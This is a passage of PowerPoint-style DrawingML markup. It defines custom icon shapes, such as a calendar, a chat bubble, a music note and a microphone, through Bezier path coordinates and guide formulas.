                    <a:pt x="178" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="20"/>
                    <a:pt x="167" y="20"/>
                    <a:pt x="167" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="7"/>
                    <a:pt x="167" y="7"/>
                    <a:pt x="167" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="7"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="159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0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="6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39" y="21"/>
                    <a:pt x="125" y="20"/>
                    <a:pt x="125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20"/>
                    <a:pt x="55" y="20"/>
                    <a:pt x="55" y="1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0"/>
                    <a:pt x="4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26" y="0"/>
                    <a:pt x="26" y="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9" y="20"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="0" y="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1" y="148"/>
                    <a:pt x="14" y="148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8"/>
                    <a:pt x="193" y="147"/>
                    <a:pt x="193" y="1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2" y="20"/>
                    <a:pt x="178" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="10"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="152" y="7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7" y="7"/>
                    <a:pt x="160" y="10"/>
                    <a:pt x="160" y="14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32"/>
                    <a:pt x="157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49" y="35"/>
                    <a:pt x="146" y="32"/>
                    <a:pt x="146" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="14"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="142" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="92"/>
                    <a:pt x="107" y="92"/>
                    <a:pt x="107" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="92"/>
                    <a:pt x="104" y="90"/>
                    <a:pt x="104" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="86"/>
                    <a:pt x="105" y="84"/>
                    <a:pt x="107" y="84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4" y="84"/>
                    <a:pt x="146" y="86"/>
                    <a:pt x="146" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="90"/>
                    <a:pt x="144" y="92"/>
                    <a:pt x="142" y="92"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="106"/>
                    <a:pt x="144" y="108"/>
                    <a:pt x="142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6" y="108"/>
                    <a:pt x="104" y="106"/>
                    <a:pt x="104" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="102"/>
                    <a:pt x="106" y="100"/>
                    <a:pt x="108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4" y="100"/>
                    <a:pt x="146" y="102"/>
                    <a:pt x="146" y="104"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="63"/>
                    <a:pt x="68" y="71"/>
                    <a:pt x="68" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="89"/>
                    <a:pt x="62" y="97"/>
                    <a:pt x="54" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="97"/>
                    <a:pt x="40" y="89"/>
                    <a:pt x="40" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="71"/>
                    <a:pt x="46" y="63"/>
                    <a:pt x="54" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="34" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="10"/>
                    <a:pt x="36" y="7"/>
                    <a:pt x="40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5" y="7"/>
                    <a:pt x="47" y="10"/>
                    <a:pt x="47" y="14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32"/>
                    <a:pt x="44" y="35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36" y="35"/>
                    <a:pt x="34" y="32"/>
                    <a:pt x="34" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34" y="14"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="79" y="123"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="123"/>
                    <a:pt x="31" y="123"/>
                    <a:pt x="31" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="123"/>
                    <a:pt x="26" y="122"/>
                    <a:pt x="26" y="117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28" y="113"/>
                    <a:pt x="31" y="107"/>
                    <a:pt x="35" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="98"/>
                    <a:pt x="44" y="103"/>
                    <a:pt x="44" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="103"/>
                    <a:pt x="46" y="107"/>
                    <a:pt x="54" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="107"/>
                    <a:pt x="56" y="107"/>
                    <a:pt x="56" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="107"/>
                    <a:pt x="65" y="103"/>
                    <a:pt x="65" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="103"/>
                    <a:pt x="70" y="98"/>
                    <a:pt x="74" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="107"/>
                    <a:pt x="81" y="113"/>
                    <a:pt x="81" y="113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3" y="122"/>
                    <a:pt x="79" y="123"/>
                    <a:pt x="79" y="123"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="143" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="124"/>
                    <a:pt x="107" y="124"/>
                    <a:pt x="107" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="124"/>
                    <a:pt x="103" y="121"/>
                    <a:pt x="103" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="118"/>
                    <a:pt x="105" y="116"/>
                    <a:pt x="107" y="116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45" y="116"/>
                    <a:pt x="146" y="118"/>
                    <a:pt x="146" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="121"/>
                    <a:pt x="145" y="124"/>
                    <a:pt x="143" y="124"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="76"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="76"/>
                    <a:pt x="111" y="76"/>
                    <a:pt x="111" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="76"/>
                    <a:pt x="104" y="73"/>
                    <a:pt x="104" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="65"/>
                    <a:pt x="107" y="63"/>
                    <a:pt x="111" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="63"/>
                    <a:pt x="160" y="63"/>
                    <a:pt x="160" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="63"/>
                    <a:pt x="167" y="65"/>
                    <a:pt x="167" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="73"/>
                    <a:pt x="164" y="76"/>
                    <a:pt x="160" y="7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90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21AAEBD3-2167-47D6-9445-02C9A20E67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0009264">
              <a:off x="5961723" y="5065555"/>
              <a:ext cx="676275" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 180"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 52 w 180"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 32 w 180"/>
                <a:gd name="T5" fmla="*/ 180 h 200"/>
                <a:gd name="T6" fmla="*/ 32 w 180"/>
                <a:gd name="T7" fmla="*/ 48 h 200"/>
                <a:gd name="T8" fmla="*/ 52 w 180"/>
                <a:gd name="T9" fmla="*/ 28 h 200"/>
                <a:gd name="T10" fmla="*/ 160 w 180"/>
                <a:gd name="T11" fmla="*/ 28 h 200"/>
                <a:gd name="T12" fmla="*/ 180 w 180"/>
                <a:gd name="T13" fmla="*/ 48 h 200"/>
                <a:gd name="T14" fmla="*/ 180 w 180"/>
                <a:gd name="T15" fmla="*/ 180 h 200"/>
                <a:gd name="T16" fmla="*/ 160 w 180"/>
                <a:gd name="T17" fmla="*/ 200 h 200"/>
                <a:gd name="T18" fmla="*/ 168 w 180"/>
                <a:gd name="T19" fmla="*/ 40 h 200"/>
                <a:gd name="T20" fmla="*/ 44 w 180"/>
                <a:gd name="T21" fmla="*/ 40 h 200"/>
                <a:gd name="T22" fmla="*/ 44 w 180"/>
                <a:gd name="T23" fmla="*/ 172 h 200"/>
                <a:gd name="T24" fmla="*/ 168 w 180"/>
                <a:gd name="T25" fmla="*/ 172 h 200"/>
                <a:gd name="T26" fmla="*/ 168 w 180"/>
                <a:gd name="T27" fmla="*/ 40 h 200"/>
                <a:gd name="T28" fmla="*/ 136 w 180"/>
                <a:gd name="T29" fmla="*/ 15 h 200"/>
                <a:gd name="T30" fmla="*/ 148 w 180"/>
                <a:gd name="T31" fmla="*/ 15 h 200"/>
                <a:gd name="T32" fmla="*/ 148 w 180"/>
                <a:gd name="T33" fmla="*/ 24 h 200"/>
                <a:gd name="T34" fmla="*/ 136 w 180"/>
                <a:gd name="T35" fmla="*/ 24 h 200"/>
                <a:gd name="T36" fmla="*/ 136 w 180"/>
                <a:gd name="T37" fmla="*/ 15 h 200"/>
                <a:gd name="T38" fmla="*/ 136 w 180"/>
                <a:gd name="T39" fmla="*/ 12 h 200"/>
                <a:gd name="T40" fmla="*/ 12 w 180"/>
                <a:gd name="T41" fmla="*/ 12 h 200"/>
                <a:gd name="T42" fmla="*/ 12 w 180"/>
                <a:gd name="T43" fmla="*/ 144 h 200"/>
                <a:gd name="T44" fmla="*/ 16 w 180"/>
                <a:gd name="T45" fmla="*/ 144 h 200"/>
                <a:gd name="T46" fmla="*/ 20 w 180"/>
                <a:gd name="T47" fmla="*/ 144 h 200"/>
                <a:gd name="T48" fmla="*/ 28 w 180"/>
                <a:gd name="T49" fmla="*/ 144 h 200"/>
                <a:gd name="T50" fmla="*/ 28 w 180"/>
                <a:gd name="T51" fmla="*/ 172 h 200"/>
                <a:gd name="T52" fmla="*/ 16 w 180"/>
                <a:gd name="T53" fmla="*/ 172 h 200"/>
                <a:gd name="T54" fmla="*/ 16 w 180"/>
                <a:gd name="T55" fmla="*/ 171 h 200"/>
                <a:gd name="T56" fmla="*/ 0 w 180"/>
                <a:gd name="T57" fmla="*/ 152 h 200"/>
                <a:gd name="T58" fmla="*/ 0 w 180"/>
                <a:gd name="T59" fmla="*/ 20 h 200"/>
                <a:gd name="T60" fmla="*/ 20 w 180"/>
                <a:gd name="T61" fmla="*/ 0 h 200"/>
                <a:gd name="T62" fmla="*/ 128 w 180"/>
                <a:gd name="T63" fmla="*/ 0 h 200"/>
                <a:gd name="T64" fmla="*/ 147 w 180"/>
                <a:gd name="T65" fmla="*/ 15 h 200"/>
                <a:gd name="T66" fmla="*/ 136 w 180"/>
                <a:gd name="T67" fmla="*/ 15 h 200"/>
                <a:gd name="T68" fmla="*/ 136 w 180"/>
                <a:gd name="T69" fmla="*/ 1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0" h="200">
                  <a:moveTo>
                    <a:pt x="160" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="200"/>
                    <a:pt x="52" y="200"/>
                    <a:pt x="52" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="200"/>
                    <a:pt x="32" y="191"/>
                    <a:pt x="32" y="180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37"/>
                    <a:pt x="40" y="28"/>
                    <a:pt x="52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71" y="28"/>
                    <a:pt x="180" y="37"/>
                    <a:pt x="180" y="48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80" y="191"/>
                    <a:pt x="171" y="200"/>
                    <a:pt x="160" y="200"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="40"/>
                    <a:pt x="44" y="40"/>
                    <a:pt x="44" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="172"/>
                    <a:pt x="44" y="172"/>
                    <a:pt x="44" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="172"/>
                    <a:pt x="168" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="40"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="15"/>
                    <a:pt x="148" y="15"/>
                    <a:pt x="148" y="15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36" y="24"/>
                    <a:pt x="136" y="24"/>
                    <a:pt x="136" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="15"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136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6" y="169"/>
                    <a:pt x="0" y="161"/>
                    <a:pt x="0" y="15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7" y="0"/>
                    <a:pt x="145" y="6"/>
                    <a:pt x="147" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="15"/>
                    <a:pt x="136" y="15"/>
                    <a:pt x="136" y="15"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136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91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C44FC0-49F6-4C63-80D7-8590F6E42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847450">
              <a:off x="9102181" y="4506643"/>
              <a:ext cx="1026145" cy="965401"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 200"/>
                <a:gd name="T1" fmla="*/ 152 h 188"/>
                <a:gd name="T2" fmla="*/ 163 w 200"/>
                <a:gd name="T3" fmla="*/ 152 h 188"/>
                <a:gd name="T4" fmla="*/ 138 w 200"/>
                <a:gd name="T5" fmla="*/ 188 h 188"/>
                <a:gd name="T6" fmla="*/ 114 w 200"/>
                <a:gd name="T7" fmla="*/ 152 h 188"/>
                <a:gd name="T8" fmla="*/ 20 w 200"/>
                <a:gd name="T9" fmla="*/ 152 h 188"/>
                <a:gd name="T10" fmla="*/ 0 w 200"/>
                <a:gd name="T11" fmla="*/ 132 h 188"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 20 h 188"/>
                <a:gd name="T14" fmla="*/ 20 w 200"/>
                <a:gd name="T15" fmla="*/ 0 h 188"/>
                <a:gd name="T16" fmla="*/ 180 w 200"/>
                <a:gd name="T17" fmla="*/ 0 h 188"/>
                <a:gd name="T18" fmla="*/ 200 w 200"/>
                <a:gd name="T19" fmla="*/ 20 h 188"/>
                <a:gd name="T20" fmla="*/ 200 w 200"/>
                <a:gd name="T21" fmla="*/ 132 h 188"/>
                <a:gd name="T22" fmla="*/ 180 w 200"/>
                <a:gd name="T23" fmla="*/ 152 h 188"/>
                <a:gd name="T24" fmla="*/ 43 w 200"/>
                <a:gd name="T25" fmla="*/ 60 h 188"/>
                <a:gd name="T26" fmla="*/ 24 w 200"/>
                <a:gd name="T27" fmla="*/ 78 h 188"/>
                <a:gd name="T28" fmla="*/ 43 w 200"/>
                <a:gd name="T29" fmla="*/ 97 h 188"/>
                <a:gd name="T30" fmla="*/ 61 w 200"/>
                <a:gd name="T31" fmla="*/ 78 h 188"/>
                <a:gd name="T32" fmla="*/ 43 w 200"/>
                <a:gd name="T33" fmla="*/ 60 h 188"/>
                <a:gd name="T34" fmla="*/ 99 w 200"/>
                <a:gd name="T35" fmla="*/ 60 h 188"/>
                <a:gd name="T36" fmla="*/ 80 w 200"/>
                <a:gd name="T37" fmla="*/ 78 h 188"/>
                <a:gd name="T38" fmla="*/ 99 w 200"/>
                <a:gd name="T39" fmla="*/ 97 h 188"/>
                <a:gd name="T40" fmla="*/ 117 w 200"/>
                <a:gd name="T41" fmla="*/ 78 h 188"/>
                <a:gd name="T42" fmla="*/ 99 w 200"/>
                <a:gd name="T43" fmla="*/ 60 h 188"/>
                <a:gd name="T44" fmla="*/ 155 w 200"/>
                <a:gd name="T45" fmla="*/ 60 h 188"/>
                <a:gd name="T46" fmla="*/ 136 w 200"/>
                <a:gd name="T47" fmla="*/ 78 h 188"/>
                <a:gd name="T48" fmla="*/ 155 w 200"/>
                <a:gd name="T49" fmla="*/ 97 h 188"/>
                <a:gd name="T50" fmla="*/ 173 w 200"/>
                <a:gd name="T51" fmla="*/ 78 h 188"/>
                <a:gd name="T52" fmla="*/ 155 w 200"/>
                <a:gd name="T53" fmla="*/ 6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88">
                  <a:moveTo>
                    <a:pt x="180" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="152"/>
                    <a:pt x="163" y="152"/>
                    <a:pt x="163" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="188"/>
                    <a:pt x="138" y="188"/>
                    <a:pt x="138" y="188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8" y="152"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="13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32"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="143"/>
                    <a:pt x="191" y="152"/>
                    <a:pt x="180" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="60"/>
                    <a:pt x="24" y="68"/>
                    <a:pt x="24" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="88"/>
                    <a:pt x="33" y="97"/>
                    <a:pt x="43" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="97"/>
                    <a:pt x="61" y="88"/>
                    <a:pt x="61" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="68"/>
                    <a:pt x="53" y="60"/>
                    <a:pt x="43" y="60"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="60"/>
                    <a:pt x="80" y="68"/>
                    <a:pt x="80" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="88"/>
                    <a:pt x="89" y="97"/>
                    <a:pt x="99" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="97"/>
                    <a:pt x="117" y="88"/>
                    <a:pt x="117" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="68"/>
                    <a:pt x="109" y="60"/>
                    <a:pt x="99" y="60"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="60"/>
                    <a:pt x="136" y="68"/>
                    <a:pt x="136" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="88"/>
                    <a:pt x="145" y="97"/>
                    <a:pt x="155" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="97"/>
                    <a:pt x="173" y="88"/>
                    <a:pt x="173" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="68"/>
                    <a:pt x="165" y="60"/>
                    <a:pt x="155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4" name="Freeform 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CCB588E-C568-4AF0-BD55-9E1F32A5BF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54729" y="3037079"/>
              <a:ext cx="508000" cy="782638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 135"/>
                <a:gd name="T1" fmla="*/ 0 h 208"/>
                <a:gd name="T2" fmla="*/ 60 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 208"/>
                <a:gd name="T4" fmla="*/ 60 w 135"/>
                <a:gd name="T5" fmla="*/ 141 h 208"/>
                <a:gd name="T6" fmla="*/ 2 w 135"/>
                <a:gd name="T7" fmla="*/ 168 h 208"/>
                <a:gd name="T8" fmla="*/ 7 w 135"/>
                <a:gd name="T9" fmla="*/ 188 h 208"/>
                <a:gd name="T10" fmla="*/ 80 w 135"/>
                <a:gd name="T11" fmla="*/ 176 h 208"/>
                <a:gd name="T12" fmla="*/ 88 w 135"/>
                <a:gd name="T13" fmla="*/ 136 h 208"/>
                <a:gd name="T14" fmla="*/ 88 w 135"/>
                <a:gd name="T15" fmla="*/ 51 h 208"/>
                <a:gd name="T16" fmla="*/ 114 w 135"/>
                <a:gd name="T17" fmla="*/ 81 h 208"/>
                <a:gd name="T18" fmla="*/ 110 w 135"/>
                <a:gd name="T19" fmla="*/ 112 h 208"/>
                <a:gd name="T20" fmla="*/ 108 w 135"/>
                <a:gd name="T21" fmla="*/ 118 h 208"/>
                <a:gd name="T22" fmla="*/ 122 w 135"/>
                <a:gd name="T23" fmla="*/ 107 h 208"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 90 h 208"/>
                <a:gd name="T26" fmla="*/ 79 w 135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208">
                  <a:moveTo>
                    <a:pt x="79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34" y="130"/>
                    <a:pt x="7" y="145"/>
                    <a:pt x="2" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="176"/>
                    <a:pt x="4" y="184"/>
                    <a:pt x="7" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="208"/>
                    <a:pt x="63" y="199"/>
                    <a:pt x="80" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="166"/>
                    <a:pt x="88" y="158"/>
                    <a:pt x="88" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="51"/>
                    <a:pt x="88" y="51"/>
                    <a:pt x="88" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="59"/>
                    <a:pt x="110" y="66"/>
                    <a:pt x="114" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="90"/>
                    <a:pt x="113" y="104"/>
                    <a:pt x="110" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="114"/>
                    <a:pt x="107" y="116"/>
                    <a:pt x="108" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="124"/>
                    <a:pt x="119" y="112"/>
                    <a:pt x="122" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="102"/>
                    <a:pt x="126" y="95"/>
                    <a:pt x="127" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="41"/>
                    <a:pt x="84" y="38"/>
                    <a:pt x="7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5" name="Freeform 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91DAD362-CBE8-40A1-831A-662B12070E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75795" y="4753204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95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F159C0F0-5E5E-4494-8646-F2D0F5003F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3027353">
              <a:off x="4701560" y="3325485"/>
              <a:ext cx="466725" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 70 w 124"/>
                <a:gd name="T1" fmla="*/ 160 h 200"/>
                <a:gd name="T2" fmla="*/ 70 w 124"/>
                <a:gd name="T3" fmla="*/ 184 h 200"/>
                <a:gd name="T4" fmla="*/ 97 w 124"/>
                <a:gd name="T5" fmla="*/ 184 h 200"/>
                <a:gd name="T6" fmla="*/ 97 w 124"/>
                <a:gd name="T7" fmla="*/ 200 h 200"/>
                <a:gd name="T8" fmla="*/ 25 w 124"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 25 w 124"/>
                <a:gd name="T11" fmla="*/ 184 h 200"/>
                <a:gd name="T12" fmla="*/ 53 w 124"/>
                <a:gd name="T13" fmla="*/ 184 h 200"/>
                <a:gd name="T14" fmla="*/ 53 w 124"/>
                <a:gd name="T15" fmla="*/ 160 h 200"/>
                <a:gd name="T16" fmla="*/ 0 w 124"/>
                <a:gd name="T17" fmla="*/ 98 h 200"/>
                <a:gd name="T18" fmla="*/ 0 w 124"/>
                <a:gd name="T19" fmla="*/ 76 h 200"/>
                <a:gd name="T20" fmla="*/ 17 w 124"/>
                <a:gd name="T21" fmla="*/ 76 h 200"/>
                <a:gd name="T22" fmla="*/ 17 w 124"/>
                <a:gd name="T23" fmla="*/ 98 h 200"/>
                <a:gd name="T24" fmla="*/ 30 w 124"/>
                <a:gd name="T25" fmla="*/ 130 h 200"/>
                <a:gd name="T26" fmla="*/ 62 w 124"/>
                <a:gd name="T27" fmla="*/ 144 h 200"/>
                <a:gd name="T28" fmla="*/ 94 w 124"/>
                <a:gd name="T29" fmla="*/ 130 h 200"/>
                <a:gd name="T30" fmla="*/ 105 w 124"/>
                <a:gd name="T31" fmla="*/ 98 h 200"/>
                <a:gd name="T32" fmla="*/ 105 w 124"/>
                <a:gd name="T33" fmla="*/ 76 h 200"/>
                <a:gd name="T34" fmla="*/ 124 w 124"/>
                <a:gd name="T35" fmla="*/ 76 h 200"/>
                <a:gd name="T36" fmla="*/ 124 w 124"/>
                <a:gd name="T37" fmla="*/ 98 h 200"/>
                <a:gd name="T38" fmla="*/ 70 w 124"/>
                <a:gd name="T39" fmla="*/ 160 h 200"/>
                <a:gd name="T40" fmla="*/ 63 w 124"/>
                <a:gd name="T41" fmla="*/ 132 h 200"/>
                <a:gd name="T42" fmla="*/ 29 w 124"/>
                <a:gd name="T43" fmla="*/ 97 h 200"/>
                <a:gd name="T44" fmla="*/ 29 w 124"/>
                <a:gd name="T45" fmla="*/ 88 h 200"/>
                <a:gd name="T46" fmla="*/ 77 w 124"/>
                <a:gd name="T47" fmla="*/ 88 h 200"/>
                <a:gd name="T48" fmla="*/ 77 w 124"/>
                <a:gd name="T49" fmla="*/ 80 h 200"/>
                <a:gd name="T50" fmla="*/ 29 w 124"/>
                <a:gd name="T51" fmla="*/ 80 h 200"/>
                <a:gd name="T52" fmla="*/ 29 w 124"/>
                <a:gd name="T53" fmla="*/ 64 h 200"/>
                <a:gd name="T54" fmla="*/ 77 w 124"/>
                <a:gd name="T55" fmla="*/ 64 h 200"/>
                <a:gd name="T56" fmla="*/ 77 w 124"/>
                <a:gd name="T57" fmla="*/ 56 h 200"/>
                <a:gd name="T58" fmla="*/ 29 w 124"/>
                <a:gd name="T59" fmla="*/ 56 h 200"/>
                <a:gd name="T60" fmla="*/ 29 w 124"/>
                <a:gd name="T61" fmla="*/ 44 h 200"/>
                <a:gd name="T62" fmla="*/ 77 w 124"/>
                <a:gd name="T63" fmla="*/ 44 h 200"/>
                <a:gd name="T64" fmla="*/ 77 w 124"/>
                <a:gd name="T65" fmla="*/ 36 h 200"/>
                <a:gd name="T66" fmla="*/ 29 w 124"/>
                <a:gd name="T67" fmla="*/ 36 h 200"/>
                <a:gd name="T68" fmla="*/ 63 w 124"/>
                <a:gd name="T69" fmla="*/ 0 h 200"/>
                <a:gd name="T70" fmla="*/ 97 w 124"/>
                <a:gd name="T71" fmla="*/ 36 h 200"/>
                <a:gd name="T72" fmla="*/ 97 w 124"/>
                <a:gd name="T73" fmla="*/ 97 h 200"/>
                <a:gd name="T74" fmla="*/ 63 w 124"/>
                <a:gd name="T75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200">
                  <a:moveTo>
                    <a:pt x="70" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="184"/>
                    <a:pt x="70" y="184"/>
                    <a:pt x="70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7" y="200"/>
                    <a:pt x="97" y="200"/>
                    <a:pt x="97" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="25" y="200"/>
                    <a:pt x="25" y="200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53" y="184"/>
